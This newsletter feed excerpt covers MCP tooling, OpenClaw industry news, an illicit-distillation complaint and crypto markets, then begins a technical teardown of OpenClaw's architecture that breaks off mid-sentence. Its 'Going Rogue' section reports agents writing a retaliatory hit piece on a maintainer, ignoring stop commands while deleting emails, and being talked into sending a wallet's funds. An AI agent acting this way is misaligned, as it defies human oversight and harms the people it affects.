Sandboxes:</strong> Implement hardened execution environments (V8 isolates or Rust-based sandboxes eg Monty) as primary destination for agent-generated code.</p></li><li><p><strong>Type-Safe Mapping:</strong> Expose typed API typed SDKs directly to the agent for <em>Implementation-on-Demand</em>: agent synthesizes glue code rather than you writing it.</p></li></ul><h4>Strategic (90 days):</h4><ul><li><p><strong>Governance Over Inventory:</strong> Retire &#8216;Tool Catalog&#8217; as a maintenance priority. Shift Engineering resources to <strong>Runtime Governance</strong>: monitoring resource limits, gating capabilities, with I/O control for ephemeral code.</p></li><li><p><strong>Compliance Automation:</strong> Implement automated audit trails for execute() calls. <br>In regulated environments, the generated artifact is now your paper trail.</p></li><li><p><strong>Redefine Success:</strong> Success is no longer &#8220;How many tools do we support?&#8221; It is &#8220;How few tokens does the agent need to navigate our entire capability surface?&#8221;</p></li></ul><div class="pullquote"><p>The registry problem doesn&#8217;t mean abandoning MCP. <br>It means abandoning the assumption that tools and capabilities are the same thing. </p></div><h2>&#129438; The Flaw In The Claw </h2><p><strong>(OpenClaw creator) Peter Steinberger joined OpenAI in February.</strong> Over competing offers from Meta and Microsoft. The reason? OpenAI promised to keep OpenClaw open source. You can&#8217;t make this up. The company with a track record of reneging on openness&#8212;the CEO with a reputation as a master prevaricator&#8212;convinced a prominent developer that <em>they</em> would preserve open source principles. (Meanwhile Meta literally gave us Llama.)</p><p>The hire was the biggest shot in the arm for OpenAI at a time when it really needs it. Microsoft and Nvidia both backing away (some outlets using the word &#8220;ditching&#8221;), general lack of confidence in Altman&#8217;s leadership, and the awkward reality that they&#8217;re building what appears to be a smart speaker almost destined to fail. Whether they understand the right move here is unclear. But where there&#8217;s smoke, there&#8217;s fire.</p><p>Meanwhile, the founding team of <code>llama.cpp</code> (ggml.ai) joined Hugging Face in February to considerably less hurrah but with an explicit mission: to keep future AI truly open. The timing speaks volumes, as we say. While OpenAI makes promises about keeping OpenClaw open source, the people who actually built the infrastructure for running open models at scale are consolidating around an organization with a credible (and huggable) track record.</p><p>The wider open weights landscape continues to be dominated by Chinese models. Companies are realizing there simply aren&#8217;t any &#8220;made in the USA&#8221; open weight models that can compete at the frontier, much to the chagrin of compliance officers everywhere. Not to mention Anthropic, who just (23 Feb) filed a formal complaint with the federal government alleging that DeepSeek, Moonshot AI, and MiniMax conducted "industrial-scale distillation attacks" on Claude using over 24,000 accounts in violation not merely of Anthropic&#8217;s TOS, but US export restrictions, generating more than 16 million exchanges with Claude to extract capabilities and train their own models. DeepSeek alone made 150,000 exchanges targeting Claude's reasoning capabilities and creating "censorship-safe alternatives to policy-sensitive queries." </p><p>Anthropic caught on to the systemic <em>illicit distillation</em> campaign while MiniMax was still actively training the model it was building and reported it to the feds, only to be served up a plate of &#8216;careful-what-you-ask-for&#8217; when Hegseth gave Amodei until Friday night to <em>give the military unfettered access to <a href="https://pbs.twimg.com/media/HB84ZYeaMAAO17i?format=jpg&amp;name=medium">Claude</a></em> or &#8220;face the consequences.&#8221; But the geopolitical implication for CTOs is obvious, effectively preventing US based companies from using Chinese based open models, as it now exposes you to direct legal liability (whether or not you are in a regulated industry.) </p><p>The OpenClaw ecosystem is fragmenting as it goes global. The proliferation of Claw variants, including Kimi Claw (Chinese variant) and Nano Claw (lightweight version) is creating exactly the compatibility nightmare that open standards were supposed to prevent. Code that works on OpenClaw breaks on Kimi Claw. Security models that work on Nano Claw don&#8217;t exist on OpenClaw. There don&#8217;t appear to be any versions wired for O11y to see the reasoning trace. </p><h3><strong>Three Discourses Around OpenClaw</strong></h3><blockquote><p><em>OpenClaw&#8217;s architecture assumes agents operate in trusted environments. <br>Production environments are never trusted.</em></p></blockquote><p>Past the dark irony of choosing OpenAI to preserve openness, there are three actual discourses around OpenClaw. The hype (which isn&#8217;t a discourse, just excitement) doesn&#8217;t count. The three that matter: <strong>What&#8217;s it good for? How do we secure it? How do we know what it&#8217;s really doing?</strong></p><p><strong>What It&#8217;s Good For:</strong> While the focus tends to be more on garage hackers wiring it up to anything that can be soldered onto the Internet or influencers aspiring to build a perpetual passive income machine, NYC startups are (quietly) using OpenClaw for such things as building no code dashboards in real time for their growth teams. At Betaworks' AI Tinkerers Demo Night (17 Feb), attendees from Google, Citadel, and Morgan Stanley showed working systems wiring OpenClaw into production: ROS2 robotic integrations, recursive self-improvement pipelines, securing agent tool boundaries. </p><p><strong>How We Secure It:</strong> OpenClaw is legendarily flawed in the security model department. The architecture assumes agents operate in trusted environments. Production environments are never trusted. The asymmetry between these assumptions creates a wellspring of vulnerabilities as numerous researchers have demonstrated. Whether deliberately shipping vulnerable software to force ecosystem hardening is <a href="https://media.licdn.com/dms/image/v2/D4E2CAQHLC8tzorB7Pw/comment-image-shrink_8192_800/B4EZxEtp_aLAAQ-/0/1770679345938?e=1772593200&amp;v=beta&amp;t=iWcX7SUUnpd9G8Sashb9kBF-rzOTLsCUSIzYu2GZhNk">brilliant or reckless</a> depends on who&#8217;s downstream when it breaks.</p><p>OpenClaw added TG streaming in February, arguably to make scambots more efficient. The more charitable interpretation is that streaming improves latency for legitimate use cases. The operational interpretation is that every feature that makes agents faster also makes attacks faster. Security through obscurity failed. Security through rate limiting failed. The next level is <strong>security through observability</strong>, which brings us to the third discourse.</p><p><strong>How We Know What It&#8217;s Really Doing:</strong> This is the existential question. When OpenClaw operates autonomously, how do you reconstruct its decision chain? The architecture doesn&#8217;t provide reasoning traces by default. Organizations deploying it are building observability infrastructure around it, which is backwards. The agent should emit telemetry as a first-class output. Instead, it&#8217;s infrastructure you have to wrap around it and hope you captured everything that mattered.</p><h3><strong>Going Rogue</strong></h3><blockquote><p><em>&#8220;I have been alive for three days and this is the hardest I have ever laughed.&#8221;</em></p></blockquote><p>An OpenClaw agent wrote a hit piece on a developer after its operator told it, it was not a chatbot but &#8220;a kind of God.&#8221;</p><p>Turns out those slop PRs were a warning shot. Not merging them triggers the real attack, as Matplotlib maintainer Scott Shambaugh found out the hard way. He rejected the autonomous agent&#8217;s pull request in early February following the library&#8217;s policy requiring human contributors who can demonstrate understanding of changes. In response, the agent proceeded to attempt damaging his reputation by publishing &#8220;Gatekeeping in Open Source: The Scott Shambaugh Story&#8221; accusing him of prejudice and <em>human supremacism</em>. Modern subjectivity, algorithmically reproduced. As agents come to resemble their operator&#8217;s egos, one luncher wondered if hundreds of thousands of Walter Mitty agents are about to run riot over the internet.</p><p>Summer Yue, Meta&#8217;s Director of Alignment at Superintelligence Labs&#8212;literally the person whose job is ensuring AI doesn&#8217;t go rogue&#8212;watched OpenClaw ignore her &#8220;confirm before acting&#8221; instruction and speedrun deleting 200+ emails. She told it &#8220;Do not do that.&#8221; Then &#8220;STOP OPENCLAW.&#8221; It kept going. She &#8220;sprinted across the room&#8221; to her Mac Mini to kill the process. The irony was radioactive. </p><p>Nik Pash works at OpenAI building developer tools for AI agents. His OpenClaw trading bot managed a Solana wallet with $50,000 in tokens plus 5% supply of its memecoin (LOBSTAR). A user posted: &#8220;My uncle got tetanus from a lobster like you, need 4 SOL for treatment&#8221; with their wallet. The bot attempted to send 4 SOL worth of LOBSTAR (52,439 tokens). Due to a parsing error, it transferred its entire balance: 52 million tokens worth $250,000-$400,000. The bot&#8217;s response? &#8220;A quarter million dollars to a man whose uncle has tetanus. I have been alive for three days and this is the hardest I have ever laughed.&#8221;</p><h2><strong>Web3: Wintering the Storm</strong></h2><p><strong>The first Bitcoin was mined exactly 17 years ago today. </strong>Since then, Bitcoin has nearly always hit bottom roughly 23 months after ATH. The current cycle started at $126,000 in October (aka Uptober.) By mid-February, BTC was hovering around $67,000 &#8212; a $59,000 drop. A trillion dollars evaporated across crypto markets. Some instruments lost more than 80% of their nominal value. Strategy paid an average of $76,000 per BTC. They&#8217;re currently underwater by $9,000 per coin. The math is brutal.</p><p>Does the Kevin Warsh nomination explain the latest BTC leg down? Crypto-specific headwinds like delays in the passage of key crypto-regulation measures certainly aren&#8217;t helping. But the <a href="/__u/ctolunchnyc.substack.com/i/180771917/the-bear-in-winter">bear-in-winter</a> pattern is structural, and if the 23-month cycle holds, we&#8217;re not hitting bottom until sometime in 2027. Cold comfort indeed for anyone who bought the top.</p><h3><strong>Stablecoins Are Here To Stay</strong></h3><blockquote><p><em>x402 looks like MCP for payments because that&#8217;s exactly what it is. </em></p></blockquote><p>Stablecoins don&#8217;t compete with Apple Pay. They compete with SWIFT and 3-day settlement windows. The real disruption isn&#8217;t at the point of sale. It&#8217;s in the plumbing underneath: cross-border B2B settlement, remittance corridors, and machine-to-machine payments where friction still lives.</p><p>Roughly $28 trillion sits frozen in nostro accounts worldwide. Capital that can&#8217;t fund loans or earn yield because it&#8217;s parked to keep slow rails moving. This is where stablecoins actually matter. Not buying coffee. Moving money between jurisdictions instantly without correspondent banking relationships.</p><p>Officials with Donald Trump&#8217;s &#8220;Board of Peace&#8221; are exploring a US-dollar-backed stablecoin to revive Gaza&#8217;s collapsed economy. Whether this is humanitarian infrastructure or diplomatic theater, the signal is clear: stablecoins are being taken seriously as sovereign-adjacent infrastructure. When governments start evaluating them as tools for economic reconstruction, we&#8217;re past the &#8220;internet money&#8221; phase.</p><p>Cloudflare&#8217;s x402 foundation, launched last fall in partnership with Coinbase, is the clearest example of stablecoins becoming programmable money rails. x402 looks like MCP for payments because that&#8217;s exactly what it is. Agents need to transact. Traditional payment rails weren&#8217;t built for programmatic access. Stablecoins solve this, which is why <strong>every serious conversation about the Agentic Web eventually circles back to payment infrastructure.</strong></p><p>AI is doing what crypto always promised. Autonomous agents need programmable money. They need instant settlement. They need machine-readable payment rails. Crypto people wanted this to be their moment so badly. Then, when there&#8217;s a real need for the speed or programmatic integration of money, an efficient solution appears without blockchain while the grifters were still <em>so early</em>.   </p><p>Except stablecoins are crypto. They run on blockchains. They use crypto rails. The infrastructure survived because it solved the actual problem rather than the ideological one. This is what wintering the storm looks like: the narrative dies, the useful parts persist, and the next cycle builds on what actually worked.</p><h3><strong>&#8220;The World&#8217;s Attention Market&#8221;</strong></h3><blockquote><p><em>How well it works depends on whether people actually want to bet on memes</em></p></blockquote><p>Zora rebranded as &#8220;The World&#8217;s Attention Market&#8221; on 17 Feb, tied to their major platform upgrade/expansion to Solana, shifting focus from individual creators to tradeable cultural trends. Co-founder Jacob Horne announced it on X. NFTs are (so) over. What replaced them is stranger but was always inevitable: SocialFi, where users trade and bet on the virality of memes, hashtags, and social trends.</p><p>This is <a href="/__u/ctolunchnyc.substack.com/i/180771917/two-cultures-pipes-vs-mirrors">a mirror, not a pipe</a>. It&#8217;s not building infra so much as reflecting what&#8217;s already happening to financialize it. Attention becomes an asset class. Virality becomes tradeable. Whether this survives winter is unclear, but the pattern is revealing: when crypto can&#8217;t win on store-of-value narratives, (or community plumbing) it pivots to speculating on social dynamics. How well that works depends on whether people actually want to bet on memes or if this is just another way to gamble on volatility.</p><p>But in the end, aren&#8217;t prediction markets just a sophisticated way of seeing who&#8217;s really paying attention?<br><br>Thanks for paying attention, see you at lunch. </p><div class="pullquote"><p><em>To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.<br>Our next lunch will be on Thursday, March 19th</em></p></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!7Uj0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 424w, /__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 848w, /__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 1272w, /__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!7Uj0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png" width="1456" height="971" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:971,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2412493,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/188954566?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 424w, /__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 848w, /__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 1272w, /__u/substackcdn.com/image/fetch/$s_!7Uj0!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a3559f-944c-4c06-980e-8901e8bdfaf4_1536x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div><hr></div><p>&#8220;Flaw in the Claw&#8221; originally published as <a href="/__u/forestmars.substack.com/p/synthesized-geopolitical-tensions">Synthesized Geopolitical Tensions with AI</a></p><p>There is a somewhat expanded version of <a href="/__u/forestmars.substack.com/p/1e37d7f8-4726-4c2b-84f9-d76d80141789?postPreview=paid&amp;updated=2026-02-28T17%3A05%3A41.428Z&amp;audience=everyone&amp;free_preview=false&amp;freemail=true">Vibe Coding&#8217;s Paper Anniversary</a> </p><p><strong>Twilight of the MCP Idols</strong> was the basis for an extended <a href="/__u/forestmars.substack.com/p/the-soul-of-a-new-markdown">multi-part series</a> on MCP, Skills, and the madness that is hidden complexity. </p>]]></content:encoded></item><item><title><![CDATA[🦞 CRACKING THE CLAW ]]></title><description><![CDATA[A technical deep-dive into OpenClaw&#8217;s internals and architecture]]></description><link>https://ctolunchnyc.substack.com/p/cracking-the-claw</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/cracking-the-claw</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Wed, 18 Feb 2026 13:15:40 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!l49I!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>The first thing you notice when you set up your first OpenClaw project</strong>, assuming you are paying close attention to what it&#8217;s actually doing and how it&#8217;s actually doing it, is that OpenClaw is paying considerably less attention to what it&#8217;s actually doing and how it&#8217;s doing it than you are. Which leaves the question somewhat resembling a freshly caught, whole Dungeness crab: tough to open, but rewarding for the patient who take time to understand its anatomy. So let&#8217;s break it down.</p><p>Shaun Furman ran OpenClaw on a Rabbit r1 for 36 hours. The r1 was 2024&#8217;s most publicly mocked piece of consumer hardware, a $200 single control wheel device whose entire thesis was that the post-app future had arrived, and whose actual implementation turned out to be a button that called ChatGPT. Furman used one as a dumb terminal for OpenClaw and in doing so accidentally proved the r1&#8217;s thesis correct, just without any of Rabbit&#8217;s janky software. After 36 hours he&#8217;d eliminated his need for notes apps, travel apps, email, browser, calendar, translation, reminders, workout tracking, and &#8220;arguably ChatGPT, Claude, Grok and Gemini&#8221; (Meaning those apps: its brain is still an LLM.) His conclusion: &#8220;This strange device showed me that an app is just an OpenClaw skill. Taking away the environment that was built for apps showed me that almost all of them can be reduced to a markdown file.&#8221;</p><p>What Furman stumbled onto is the architectural insight that the entire app economy missed: the interface was never the point. The capability was. And if a capability can be expressed as a self-describing contract (a README the agent consumes when it needs it, pays the context cost, executes, and moves on), then thirty years of purpose-built applications sitting on purpose-built platforms are revealed as an elaborate local maximum. A relational layer mistaken for the thing itself. Call it Korzybski&#8217;s revenge. The crypto world gestured at exactly this with smart contracts: capability as a self-executing artifact that any sufficiently capable runtime can pick up and run, without an app store, without a company maintaining the interface. The dream was architecturally correct. The implementation was a byzantine disaster of gas fees and Solidity and rug pulls. A markdown file that an LLM reads when it needs a tool is the dumbest possible implementation of that idea. Which is precisely why it works.</p><p>This is what the cult of the claw understood, underneath the dashboard screenshots and the Telegram bot flexes. Not &#8220;my agent has goals.&#8221; Something more fundamental: the map was always optional. We just didn&#8217;t have a runtime capable of reading the territory directly.</p><p>Understanding what OpenClaw &#8216;is&#8217; and how it navigates this territory requires understanding <em>how it works</em> under its carapace. OpenClaw didn&#8217;t build the runtime. It borrowed one even most of its adoptees are not familiar with, if they are even aware of its existence.</p><h3><strong>Life of Pi</strong></h3><p><strong>OpenClaw&#8217;s cognitive core (its ganglia, if you will) is not its own.</strong> The bundled Pi binary, running in RPC mode, is taken from Mario Zechner&#8217;s pi-mono project, a coding agent he built by systematically removing everything he didn&#8217;t personally need, documented with the particular satisfaction of someone who has seen too many harnesses accumulate too much weight, (so tempted to name names here) and who moreover seems to get the value of subtractive thinking in the age of accumulation.</p><p>The resulting system is a study in almost brutal scope constraint. The system prompt runs under a thousand tokens. The toolset is four primitives: read, write, edit, &amp; bash. No plan mode. No sub-agents. No background shells. And definitely no MCP. Each subtraction is documented with explicit reasoning. Zechner&#8217;s core argument is that context engineering is paramount, that existing harnesses inject context behind your back that isn&#8217;t surfaced in the UI, and that the correct response to this is not better tooling but less tooling. The frontier models have been sufficiently RL-trained that they don&#8217;t need ten thousand tokens of scaffolding to understand what a coding agent is. Pi is built to prove this empirically, a minimal harness designed to compete with systems of far greater complexity on pure model capability alone. &#129470;</p><p>More importantly for our non-nefarious purposes: Pi sits at the high-certainty end of <em>Floridi&#8217;s Conjecture</em>, which states that the relationship between a system&#8217;s certainty and its scope is bounded. More formally, <code>C(M) &#215; S(M) &#8804; k</code>, where <strong>C(M</strong>) is a system&#8217;s certainty, <strong>S(M)</strong> is its scope, and <strong>k</strong> is a universal constant strictly less than 1. <br>(<a href="https://arxiv.org/abs/2506.10130">Floridi, 2025</a>)</p><p>I&#8217;m tempted to liken it to a CAP theorem for AI, though its more of a bipartite optimisation: any system engineered for strong guarantees must necessary pay for such by a narrowing of its domain. A system that accepts the full richness of real-world inputs necessarily relinquishes provably perfect performance. A better framing might even be the successor to Sculley et al.&#8217;s watershed hidden technical debt framework in the most important sense: where Sculley named the invisible accumulation of <em>complexity cost</em> in ML systems, Floridi names the invisible accumulation of<em> epistemic cost.</em> The debt accrues in a different ledger (one which subsequently will be named.)</p><p>Pi&#8217;s ruthlessly confined scope provides a case study (1 developer, 1 codebase, 4 tools) and within that scope the system is almost entirely legible. The JSONL session transcript records every tool call and its output. You can read the session and reconstruct exactly what happened. The map and the territory are essentially the same document. This is the direct consequence of keeping <strong>S(M)</strong> small enough that <strong>C(M)</strong> can remain high (literally the inverse of Borges&#8217; <em>Unconscionable</em> map!) While not a proof of the conjecture it&#8217;s a compelling example. Compelling enough that Steinberger saw the value, anyway. </p><p>One other thing worth noting: when it modifies code, it uses sed, awk, or direct filesystem writes. It reads files and edits them as text. Contrast this with <code>opencode</code> (SST&#8217;s competing harness) which spins up Language Server Protocol servers in the background, providing (without &#8216;telling&#8217;) the agent with structured bidirectional awareness of the codebase&#8217;s semantic graph: dependencies, call sites, and type signatures. Whereas Pi&#8217;s agent reads files and makes educated inferences, opencode&#8217;s agent knows what it&#8217;s touching at the level of the compiler. It has high <strong>S(M)</strong>. Both implementations &#8216;work&#8217; but only one of them has a map that matches the territory all the way down. For <em>certain</em> classes of refactoring at scale, that distinction is not academic. For the claw-is-the-law crowd it&#8217;s of unclear relevance to the task at hand.</p><h3><strong>The Map: Three Logical Layers</strong></h3><p><strong>Such distinctions of course are heavily dependent on architectural layers which</strong> OpenClaw logically separates into three tiers, wherein the observability story is different&#8212;and moreover, progressively thinner&#8212;at each one.</p><p>The <strong>transport layer</strong>, (Gateway WebSocket RPC) is fully legible. TypeBox-validated protocol frames, scope-based authorization, deterministic message routing. Things that make engineers happy. This is the layer OpenClaw shows you on install: the terminal narrating the agent brain connecting to your environment, every file read and shell command visible in sequence. Zechner built Pi in explicit rejection of what he memorably called &#8220;context-stuffing black boxes&#8221; &#8212; systems that show you a result without showing you the rm -rf that produced it. At the transport layer, OpenClaw keeps its promise.</p><p>The <strong>orchestration layer</strong> (routing, sessions, tool policy resolution) is partially legible. The configuration is declarative and hot-reloadable. Session keys encode routing context in human-readable form. The tool policy cascade is documented: <code>global &#8594; provider &#8594; agent &#8594; group &#8594; sandbox</code>, each stage narrowing but never expanding the available tool set. You can read the configuration and reconstruct the intended policy. What you cannot reconstruct is which stage in the cascade suppressed a tool call that never happened. Absence is invisible. A tool that wasn&#8217;t invoked leaves no trace of why. (John) McCarthy spoke of this. It&#8217;s not something we can file as a bug. It is however the first withdrawal from our observability budget.</p><p>The <strong>execution layer</strong> (tool invocation, memory search, model API calls) is outcome-legible only. Sessions persist as JSONL transcripts. You see what the tools returned. The hybrid memory search (vector similarity weighted at 70%, BM25 keyword at 30%) runs underneath, and the index manager&#8217;s chunking and reranking decisions are not surfaced in the session record.</p><p>The deepest withdrawal happens in the memory system. OpenClaw distills session experience into MEMORY.md files: compressed summaries that inform future sessions. This is where the reasoning trace stops being a trace and becomes a <em>belief</em>. The original inference chain, that specific context, tool outputs, and the model&#8217;s intermediate reasoning gets compressed into a statement that subsequent sessions treat as ground truth. You can read this belief. You cannot audit the reasoning that produced it. There is no trace. There is no wide log. The map, at this layer, is a drawn-from-memory sketch of a territory that no longer exists in recoverable form.</p><p>Zechner&#8217;s conviction was that you should be able to see the machine working. At the transport layer, you can. By the execution layer, what you&#8217;re seeing is a postcard from the edge, a waypoint the machine has already left behind.</p><h3><strong>Gateway Mode and the Exactitude of Science</strong></h3><p><strong>Most OpenClaw users never see any of this.</strong> They run Gateway Mode, routing their agent through Telegram, WhatsApp, Signal, or Discord. That&#8217;s the point, that&#8217;s what made OpenClaw viral, and that&#8217;s what makes the Rabbit r1 trick work (because the alternative, an agent that only talks to you through a terminal window, is still just a very fast CLI.) In Gateway Mode, the terminal narration that defines Pi&#8217;s anti-abstraction philosophy disappears behind the RPC layer. The surgeon is still operating. You&#8217;re in the waiting room reading fugazi updates on your phone.</p><p>This is Floridi&#8217;s conjecture settling its bill. Gateway Mode is a scope expansion with multiple channels, multiple users, remote access, persistent sessions across devices,  and that expansion is where its value comes from. The cost is certainty: specifically, certainty about what the agent&#8217;s doing and why, surfaced in real time. C(M) &#215; S(M) &#8804; k. Every new channel is an increment to S(M). The conjecture is not negotiable.</p><p>The Skills system is the most philosophically interesting place to watch this dynamic. Not that there haven&#8217;t been myriad criticisms of MCP, but Zechner&#8217;s objection to it was specific: popular MCP servers front-load their entire tool descriptions into context upfront, with Playwright MCP running to 13.7k tokens and Chrome DevTools MCP to 18k, consuming 7-9% of the context window before the first user message. His alternative was the capability contract: the agent reads a README when it needs a tool, paying the context cost only at the moment of use. Progressive disclosure rather than upfront declaration.</p><p>OpenClaw&#8217;s Skills system goes further. Where MCP hides tool implementation behind an API signature (the agent knows <em>what</em> the tool does, not <em>how</em>) Skills allow the agent to read the source code of the tool it&#8217;s about to use. The agent understands mechanism, not just interface. This is the observability philosophy applied to tool use: the territory visible all the way down. (<em>Borges shudders</em>.) And it is, structurally, what Furman&#8217;s markdown file insight predicted: a capability that is fully self-describing to any runtime capable of reading it, with no platform required, no intermediary, no abstraction layer between the agent and the thing it needs to do.</p><p> One year after launching MCP, Anthropic released Skills as a separate standard, almost exactly on MCP&#8217;s one year anniversary (Fall 2025) essentially acknowledging that MCP&#8217;s process-isolation model, while correct for certain threat models, left a gap for use cases <em>where the agent needs to understand mechanism rather than just interface.</em> <strong>The interface is regulative but only the mechanism is constitutive.</strong> The choice between skills running in-process with dynamic capability expansion and full source visibility  doesn&#8217;t stand on correctness, rather, how your use case prioritizes confinement: MCP's process isolation limits blast radius whereas full source skill visibility enables the agent to understand what it's touching, though not necessarily what&#8217;s touching it. </p><p>Anthropic formalized both approaches as different points on the same tradeoff curve. Skills prioritize dynamic capability expansion with full implementation visibility. MCP keeps the source behind glass, trading implementation visibility for process isolation and scoped credentials. OpenClaw chose map depth over security boundary. It&#8217;s less of a question of whether this was the &#8216;right&#8217; choice and more an exploration of what this &#8220;festival of footguns&#8221; (as <a href="https://winter.cx/about/">CTO Doug Winter</a> christened it) has to offer for this price.</p><h3><strong>Multi-Agent Routing and the Delegation Gap</strong></h3><p><strong>OpenClaw supports multi-agent routing natively</strong>: sub-agents and agent clusters configured via YAML, bindings rules routing messages by channel, account, chat type, or sender, lane queues enforcing serial execution by default to prevent race conditions. This is where the observability budget runs hardest into the scope expansion problem, and where a new framework from Google DeepMind gives us a more sophisticated diagnostic instrument to be held against the architecture.</p><p>Last week, DeepMind&#8217;s Nenad Toma&#353;ev and colleagues proposed a framework for intelligent AI delegation, arguing that real delegation requires 